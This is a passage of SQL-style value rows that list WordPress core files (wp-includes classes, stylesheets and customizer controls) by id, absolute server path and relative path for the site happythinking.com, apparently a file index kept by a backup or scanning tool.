(4657, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-term.php', 'wp-includes/class-wp-term.php'),
(4658, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-text-diff-renderer-inline.php', 'wp-includes/class-wp-text-diff-renderer-inline.php'),
(4659, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-text-diff-renderer-table.php', 'wp-includes/class-wp-text-diff-renderer-table.php'),
(4660, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-textdomain-registry.php', 'wp-includes/class-wp-textdomain-registry.php'),
(4661, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-theme-json-data.php', 'wp-includes/class-wp-theme-json-data.php'),
(4662, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-theme-json-resolver.php', 'wp-includes/class-wp-theme-json-resolver.php'),
(4663, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-theme-json-schema.php', 'wp-includes/class-wp-theme-json-schema.php'),
(4664, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-theme-json.php', 'wp-includes/class-wp-theme-json.php'),
(4665, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-theme.php', 'wp-includes/class-wp-theme.php'),
(4666, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-user-meta-session-tokens.php', 'wp-includes/class-wp-user-meta-session-tokens.php'),
(4667, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-user-query.php', 'wp-includes/class-wp-user-query.php'),
(4668, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-user-request.php', 'wp-includes/class-wp-user-request.php'),
(4669, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-user.php', 'wp-includes/class-wp-user.php'),
(4670, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-walker.php', 'wp-includes/class-wp-walker.php'),
(4671, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-widget-factory.php', 'wp-includes/class-wp-widget-factory.php'),
(4672, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-widget.php', 'wp-includes/class-wp-widget.php'),
(4673, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-xmlrpc-server.php', 'wp-includes/class-wp-xmlrpc-server.php'),
(4674, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp.php', 'wp-includes/class-wp.php'),
(4675, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wpdb.php', 'wp-includes/class-wpdb.php'),
(4676, '/home/equipm11/public_html/happythinking.com/wp-includes/class.wp-dependencies.php', 'wp-includes/class.wp-dependencies.php'),
(4677, '/home/equipm11/public_html/happythinking.com/wp-includes/class.wp-scripts.php', 'wp-includes/class.wp-scripts.php'),
(4678, '/home/equipm11/public_html/happythinking.com/wp-includes/class.wp-styles.php', 'wp-includes/class.wp-styles.php'),
(4679, '/home/equipm11/public_html/happythinking.com/wp-includes/comment-template.php', 'wp-includes/comment-template.php'),
(4680, '/home/equipm11/public_html/happythinking.com/wp-includes/comment.php', 'wp-includes/comment.php'),
(4681, '/home/equipm11/public_html/happythinking.com/wp-includes/compat.php', 'wp-includes/compat.php'),
(4682, '/home/equipm11/public_html/happythinking.com/wp-includes/cron.php', 'wp-includes/cron.php'),
(4683, '/home/equipm11/public_html/happythinking.com/wp-includes/css/admin-bar-rtl.css', 'wp-includes/css/admin-bar-rtl.css'),
(4684, '/home/equipm11/public_html/happythinking.com/wp-includes/css/admin-bar-rtl.min.css', 'wp-includes/css/admin-bar-rtl.min.css'),
(4685, '/home/equipm11/public_html/happythinking.com/wp-includes/css/admin-bar.css', 'wp-includes/css/admin-bar.css'),
(4686, '/home/equipm11/public_html/happythinking.com/wp-includes/css/admin-bar.min.css', 'wp-includes/css/admin-bar.min.css'),
(4687, '/home/equipm11/public_html/happythinking.com/wp-includes/css/buttons-rtl.css', 'wp-includes/css/buttons-rtl.css'),
(4688, '/home/equipm11/public_html/happythinking.com/wp-includes/css/buttons-rtl.min.css', 'wp-includes/css/buttons-rtl.min.css'),
(4689, '/home/equipm11/public_html/happythinking.com/wp-includes/css/buttons.css', 'wp-includes/css/buttons.css'),
(4690, '/home/equipm11/public_html/happythinking.com/wp-includes/css/buttons.min.css', 'wp-includes/css/buttons.min.css'),
(4691, '/home/equipm11/public_html/happythinking.com/wp-includes/css/classic-themes.css', 'wp-includes/css/classic-themes.css'),
(4692, '/home/equipm11/public_html/happythinking.com/wp-includes/css/classic-themes.min.css', 'wp-includes/css/classic-themes.min.css'),
(4693, '/home/equipm11/public_html/happythinking.com/wp-includes/css/customize-preview-rtl.css', 'wp-includes/css/customize-preview-rtl.css'),
(4694, '/home/equipm11/public_html/happythinking.com/wp-includes/css/customize-preview-rtl.min.css', 'wp-includes/css/customize-preview-rtl.min.css'),
(4695, '/home/equipm11/public_html/happythinking.com/wp-includes/css/customize-preview.css', 'wp-includes/css/customize-preview.css'),
(4696, '/home/equipm11/public_html/happythinking.com/wp-includes/css/customize-preview.min.css', 'wp-includes/css/customize-preview.min.css'),
(4697, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dashicons.css', 'wp-includes/css/dashicons.css'),
(4698, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dashicons.min.css', 'wp-includes/css/dashicons.min.css'),
(4699, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-directory/style-rtl.css', 'wp-includes/css/dist/block-directory/style-rtl.css'),
(4700, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-directory/style-rtl.min.css', 'wp-includes/css/dist/block-directory/style-rtl.min.css'),
(4701, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-directory/style.css', 'wp-includes/css/dist/block-directory/style.css'),
(4702, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-directory/style.min.css', 'wp-includes/css/dist/block-directory/style.min.css'),
(4703, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/content-rtl.css', 'wp-includes/css/dist/block-editor/content-rtl.css'),
(4704, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/content-rtl.min.css', 'wp-includes/css/dist/block-editor/content-rtl.min.css'),
(4705, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/content.css', 'wp-includes/css/dist/block-editor/content.css'),
(4706, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/content.min.css', 'wp-includes/css/dist/block-editor/content.min.css'),
(4707, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/default-editor-styles-rtl.css', 'wp-includes/css/dist/block-editor/default-editor-styles-rtl.css'),
(4708, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/default-editor-styles-rtl.min.css', 'wp-includes/css/dist/block-editor/default-editor-styles-rtl.min.css'),
(4709, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/default-editor-styles.css', 'wp-includes/css/dist/block-editor/default-editor-styles.css'),
(4710, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/default-editor-styles.min.css', 'wp-includes/css/dist/block-editor/default-editor-styles.min.css'),
(4711, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/style-rtl.css', 'wp-includes/css/dist/block-editor/style-rtl.css'),
(4712, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/style-rtl.min.css', 'wp-includes/css/dist/block-editor/style-rtl.min.css'),
(4713, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/style.css', 'wp-includes/css/dist/block-editor/style.css'),
(4714, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-editor/style.min.css', 'wp-includes/css/dist/block-editor/style.min.css'),
(4715, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/classic-rtl.css', 'wp-includes/css/dist/block-library/classic-rtl.css'),
(4716, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/classic-rtl.min.css', 'wp-includes/css/dist/block-library/classic-rtl.min.css'),
(4717, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/classic.css', 'wp-includes/css/dist/block-library/classic.css'),
(4718, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/classic.min.css', 'wp-includes/css/dist/block-library/classic.min.css'),
(4719, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/common-rtl.css', 'wp-includes/css/dist/block-library/common-rtl.css'),
(4720, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/common-rtl.min.css', 'wp-includes/css/dist/block-library/common-rtl.min.css'),
(4721, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/common.css', 'wp-includes/css/dist/block-library/common.css'),
(4722, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/common.min.css', 'wp-includes/css/dist/block-library/common.min.css'),
(4723, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/editor-elements-rtl.css', 'wp-includes/css/dist/block-library/editor-elements-rtl.css'),
(4724, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/editor-elements-rtl.min.css', 'wp-includes/css/dist/block-library/editor-elements-rtl.min.css'),
(4725, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/editor-elements.css', 'wp-includes/css/dist/block-library/editor-elements.css'),
(4726, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/editor-elements.min.css', 'wp-includes/css/dist/block-library/editor-elements.min.css'),
(4727, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/editor-rtl.css', 'wp-includes/css/dist/block-library/editor-rtl.css'),
(4728, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/editor-rtl.min.css', 'wp-includes/css/dist/block-library/editor-rtl.min.css'),
(4729, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/editor.css', 'wp-includes/css/dist/block-library/editor.css'),
(4730, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/editor.min.css', 'wp-includes/css/dist/block-library/editor.min.css'),
(4731, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/elements-rtl.css', 'wp-includes/css/dist/block-library/elements-rtl.css'),
(4732, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/elements-rtl.min.css', 'wp-includes/css/dist/block-library/elements-rtl.min.css'),
(4733, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/elements.css', 'wp-includes/css/dist/block-library/elements.css'),
(4734, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/elements.min.css', 'wp-includes/css/dist/block-library/elements.min.css'),
(4735, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/reset-rtl.css', 'wp-includes/css/dist/block-library/reset-rtl.css'),
(4736, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/reset-rtl.min.css', 'wp-includes/css/dist/block-library/reset-rtl.min.css'),
(4737, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/reset.css', 'wp-includes/css/dist/block-library/reset.css'),
(4738, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/reset.min.css', 'wp-includes/css/dist/block-library/reset.min.css'),
(4739, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/style-rtl.css', 'wp-includes/css/dist/block-library/style-rtl.css'),
(4740, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/style-rtl.min.css', 'wp-includes/css/dist/block-library/style-rtl.min.css'),
(4741, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/style.css', 'wp-includes/css/dist/block-library/style.css'),
(4742, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/style.min.css', 'wp-includes/css/dist/block-library/style.min.css'),
(4743, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/theme-rtl.css', 'wp-includes/css/dist/block-library/theme-rtl.css'),
(4744, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/theme-rtl.min.css', 'wp-includes/css/dist/block-library/theme-rtl.min.css'),
(4745, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/theme.css', 'wp-includes/css/dist/block-library/theme.css'),
(4746, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/block-library/theme.min.css', 'wp-includes/css/dist/block-library/theme.min.css'),
(4747, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/commands/style-rtl.css', 'wp-includes/css/dist/commands/style-rtl.css'),
(4748, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/commands/style-rtl.min.css', 'wp-includes/css/dist/commands/style-rtl.min.css'),
(4749, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/commands/style.css', 'wp-includes/css/dist/commands/style.css'),
(4750, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/commands/style.min.css', 'wp-includes/css/dist/commands/style.min.css'),
(4751, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/components/style-rtl.css', 'wp-includes/css/dist/components/style-rtl.css'),
(4752, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/components/style-rtl.min.css', 'wp-includes/css/dist/components/style-rtl.min.css'),
(4753, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/components/style.css', 'wp-includes/css/dist/components/style.css'),
(4754, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/components/style.min.css', 'wp-includes/css/dist/components/style.min.css'),
(4755, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/customize-widgets/style-rtl.css', 'wp-includes/css/dist/customize-widgets/style-rtl.css'),
(4756, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/customize-widgets/style-rtl.min.css', 'wp-includes/css/dist/customize-widgets/style-rtl.min.css'),
(4757, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/customize-widgets/style.css', 'wp-includes/css/dist/customize-widgets/style.css'),
(4758, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/customize-widgets/style.min.css', 'wp-includes/css/dist/customize-widgets/style.min.css'),
(4759, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-post/classic-rtl.css', 'wp-includes/css/dist/edit-post/classic-rtl.css'),
(4760, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-post/classic-rtl.min.css', 'wp-includes/css/dist/edit-post/classic-rtl.min.css'),
(4761, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-post/classic.css', 'wp-includes/css/dist/edit-post/classic.css'),
(4762, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-post/classic.min.css', 'wp-includes/css/dist/edit-post/classic.min.css'),
(4763, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-post/style-rtl.css', 'wp-includes/css/dist/edit-post/style-rtl.css'),
(4764, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-post/style-rtl.min.css', 'wp-includes/css/dist/edit-post/style-rtl.min.css'),
(4765, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-post/style.css', 'wp-includes/css/dist/edit-post/style.css'),
(4766, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-post/style.min.css', 'wp-includes/css/dist/edit-post/style.min.css'),
(4767, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-site/style-rtl.css', 'wp-includes/css/dist/edit-site/style-rtl.css'),
(4768, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-site/style-rtl.min.css', 'wp-includes/css/dist/edit-site/style-rtl.min.css'),
(4769, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-site/style.css', 'wp-includes/css/dist/edit-site/style.css'),
(4770, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-site/style.min.css', 'wp-includes/css/dist/edit-site/style.min.css'),
(4771, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-widgets/style-rtl.css', 'wp-includes/css/dist/edit-widgets/style-rtl.css'),
(4772, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-widgets/style-rtl.min.css', 'wp-includes/css/dist/edit-widgets/style-rtl.min.css'),
(4773, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-widgets/style.css', 'wp-includes/css/dist/edit-widgets/style.css'),
(4774, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/edit-widgets/style.min.css', 'wp-includes/css/dist/edit-widgets/style.min.css'),
(4775, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/editor/style-rtl.css', 'wp-includes/css/dist/editor/style-rtl.css'),
(4776, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/editor/style-rtl.min.css', 'wp-includes/css/dist/editor/style-rtl.min.css'),
(4777, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/editor/style.css', 'wp-includes/css/dist/editor/style.css'),
(4778, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/editor/style.min.css', 'wp-includes/css/dist/editor/style.min.css'),
(4779, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/format-library/style-rtl.css', 'wp-includes/css/dist/format-library/style-rtl.css'),
(4780, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/format-library/style-rtl.min.css', 'wp-includes/css/dist/format-library/style-rtl.min.css'),
(4781, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/format-library/style.css', 'wp-includes/css/dist/format-library/style.css'),
(4782, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/format-library/style.min.css', 'wp-includes/css/dist/format-library/style.min.css'),
(4783, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/list-reusable-blocks/style-rtl.css', 'wp-includes/css/dist/list-reusable-blocks/style-rtl.css'),
(4784, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css', 'wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css'),
(4785, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/list-reusable-blocks/style.css', 'wp-includes/css/dist/list-reusable-blocks/style.css'),
(4786, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/list-reusable-blocks/style.min.css', 'wp-includes/css/dist/list-reusable-blocks/style.min.css'),
(4787, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/nux/style-rtl.css', 'wp-includes/css/dist/nux/style-rtl.css'),
(4788, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/nux/style-rtl.min.css', 'wp-includes/css/dist/nux/style-rtl.min.css'),
(4789, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/nux/style.css', 'wp-includes/css/dist/nux/style.css'),
(4790, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/nux/style.min.css', 'wp-includes/css/dist/nux/style.min.css'),
(4791, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/patterns/style-rtl.css', 'wp-includes/css/dist/patterns/style-rtl.css'),
(4792, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/patterns/style-rtl.min.css', 'wp-includes/css/dist/patterns/style-rtl.min.css'),
(4793, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/patterns/style.css', 'wp-includes/css/dist/patterns/style.css'),
(4794, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/patterns/style.min.css', 'wp-includes/css/dist/patterns/style.min.css'),
(4795, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/preferences/style-rtl.css', 'wp-includes/css/dist/preferences/style-rtl.css'),
(4796, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/preferences/style-rtl.min.css', 'wp-includes/css/dist/preferences/style-rtl.min.css'),
(4797, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/preferences/style.css', 'wp-includes/css/dist/preferences/style.css'),
(4798, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/preferences/style.min.css', 'wp-includes/css/dist/preferences/style.min.css'),
(4799, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/reusable-blocks/style-rtl.css', 'wp-includes/css/dist/reusable-blocks/style-rtl.css'),
(4800, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/reusable-blocks/style-rtl.min.css', 'wp-includes/css/dist/reusable-blocks/style-rtl.min.css'),
(4801, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/reusable-blocks/style.css', 'wp-includes/css/dist/reusable-blocks/style.css'),
(4802, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/reusable-blocks/style.min.css', 'wp-includes/css/dist/reusable-blocks/style.min.css'),
(4803, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/widgets/style-rtl.css', 'wp-includes/css/dist/widgets/style-rtl.css'),
(4804, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/widgets/style-rtl.min.css', 'wp-includes/css/dist/widgets/style-rtl.min.css'),
(4805, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/widgets/style.css', 'wp-includes/css/dist/widgets/style.css'),
(4806, '/home/equipm11/public_html/happythinking.com/wp-includes/css/dist/widgets/style.min.css', 'wp-includes/css/dist/widgets/style.min.css'),
(4807, '/home/equipm11/public_html/happythinking.com/wp-includes/css/editor-rtl.css', 'wp-includes/css/editor-rtl.css'),
(4808, '/home/equipm11/public_html/happythinking.com/wp-includes/css/editor-rtl.min.css', 'wp-includes/css/editor-rtl.min.css'),
(4809, '/home/equipm11/public_html/happythinking.com/wp-includes/css/editor.css', 'wp-includes/css/editor.css'),
(4810, '/home/equipm11/public_html/happythinking.com/wp-includes/css/editor.min.css', 'wp-includes/css/editor.min.css'),
(4811, '/home/equipm11/public_html/happythinking.com/wp-includes/css/jquery-ui-dialog-rtl.css', 'wp-includes/css/jquery-ui-dialog-rtl.css'),
(4812, '/home/equipm11/public_html/happythinking.com/wp-includes/css/jquery-ui-dialog-rtl.min.css', 'wp-includes/css/jquery-ui-dialog-rtl.min.css'),
(4813, '/home/equipm11/public_html/happythinking.com/wp-includes/css/jquery-ui-dialog.css', 'wp-includes/css/jquery-ui-dialog.css'),
(4814, '/home/equipm11/public_html/happythinking.com/wp-includes/css/jquery-ui-dialog.min.css', 'wp-includes/css/jquery-ui-dialog.min.css'),
(4815, '/home/equipm11/public_html/happythinking.com/wp-includes/css/media-views-rtl.css', 'wp-includes/css/media-views-rtl.css'),
(4816, '/home/equipm11/public_html/happythinking.com/wp-includes/css/media-views-rtl.min.css', 'wp-includes/css/media-views-rtl.min.css'),
(4817, '/home/equipm11/public_html/happythinking.com/wp-includes/css/media-views.css', 'wp-includes/css/media-views.css'),
(4818, '/home/equipm11/public_html/happythinking.com/wp-includes/css/media-views.min.css', 'wp-includes/css/media-views.min.css'),
(4819, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-auth-check-rtl.css', 'wp-includes/css/wp-auth-check-rtl.css'),
(4820, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-auth-check-rtl.min.css', 'wp-includes/css/wp-auth-check-rtl.min.css'),
(4821, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-auth-check.css', 'wp-includes/css/wp-auth-check.css'),
(4822, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-auth-check.min.css', 'wp-includes/css/wp-auth-check.min.css'),
(4823, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-embed-template-ie.css', 'wp-includes/css/wp-embed-template-ie.css'),
(4824, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-embed-template-ie.min.css', 'wp-includes/css/wp-embed-template-ie.min.css'),
(4825, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-embed-template.css', 'wp-includes/css/wp-embed-template.css'),
(4826, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-embed-template.min.css', 'wp-includes/css/wp-embed-template.min.css'),
(4827, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-pointer-rtl.css', 'wp-includes/css/wp-pointer-rtl.css'),
(4828, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-pointer-rtl.min.css', 'wp-includes/css/wp-pointer-rtl.min.css'),
(4829, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-pointer.css', 'wp-includes/css/wp-pointer.css'),
(4830, '/home/equipm11/public_html/happythinking.com/wp-includes/css/wp-pointer.min.css', 'wp-includes/css/wp-pointer.min.css'),
(4831, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-background-image-control.php', 'wp-includes/customize/class-wp-customize-background-image-control.php'),
(4832, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-background-image-setting.php', 'wp-includes/customize/class-wp-customize-background-image-setting.php'),
(4833, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-background-position-control.php', 'wp-includes/customize/class-wp-customize-background-position-control.php'),
(4834, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-code-editor-control.php', 'wp-includes/customize/class-wp-customize-code-editor-control.php'),
(4835, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-color-control.php', 'wp-includes/customize/class-wp-customize-color-control.php'),
(4836, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-cropped-image-control.php', 'wp-includes/customize/class-wp-customize-cropped-image-control.php'),
(4837, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-custom-css-setting.php', 'wp-includes/customize/class-wp-customize-custom-css-setting.php'),
(4838, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-date-time-control.php', 'wp-includes/customize/class-wp-customize-date-time-control.php'),
(4839, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-filter-setting.php', 'wp-includes/customize/class-wp-customize-filter-setting.php'),
(4840, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-header-image-control.php', 'wp-includes/customize/class-wp-customize-header-image-control.php'),
(4841, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-header-image-setting.php', 'wp-includes/customize/class-wp-customize-header-image-setting.php'),
(4842, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-image-control.php', 'wp-includes/customize/class-wp-customize-image-control.php'),
(4843, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-media-control.php', 'wp-includes/customize/class-wp-customize-media-control.php'),
(4844, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php', 'wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php'),
(4845, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-nav-menu-control.php', 'wp-includes/customize/class-wp-customize-nav-menu-control.php'),
(4846, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-nav-menu-item-control.php', 'wp-includes/customize/class-wp-customize-nav-menu-item-control.php'),
(4847, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php', 'wp-includes/customize/class-wp-customize-nav-menu-item-setting.php'),
(4848, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-nav-menu-location-control.php', 'wp-includes/customize/class-wp-customize-nav-menu-location-control.php'),
(4849, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php', 'wp-includes/customize/class-wp-customize-nav-menu-locations-control.php'),
(4850, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-nav-menu-name-control.php', 'wp-includes/customize/class-wp-customize-nav-menu-name-control.php'),
(4851, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-nav-menu-section.php', 'wp-includes/customize/class-wp-customize-nav-menu-section.php'),
(4852, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-nav-menu-setting.php', 'wp-includes/customize/class-wp-customize-nav-menu-setting.php'),
(4853, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-nav-menus-panel.php', 'wp-includes/customize/class-wp-customize-nav-menus-panel.php'),
(4854, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-new-menu-control.php', 'wp-includes/customize/class-wp-customize-new-menu-control.php'),
(4855, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-new-menu-section.php', 'wp-includes/customize/class-wp-customize-new-menu-section.php'),
(4856, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-partial.php', 'wp-includes/customize/class-wp-customize-partial.php'),
(4857, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-selective-refresh.php', 'wp-includes/customize/class-wp-customize-selective-refresh.php'),
(4858, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-sidebar-section.php', 'wp-includes/customize/class-wp-customize-sidebar-section.php'),
(4859, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-site-icon-control.php', 'wp-includes/customize/class-wp-customize-site-icon-control.php'),
(4860, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-theme-control.php', 'wp-includes/customize/class-wp-customize-theme-control.php'),
(4861, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-themes-panel.php', 'wp-includes/customize/class-wp-customize-themes-panel.php'),
(4862, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-themes-section.php', 'wp-includes/customize/class-wp-customize-themes-section.php'),
(4863, '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-customize-upload-control.php', 'wp-includes/customize/class-wp-customize-upload-control.php'),
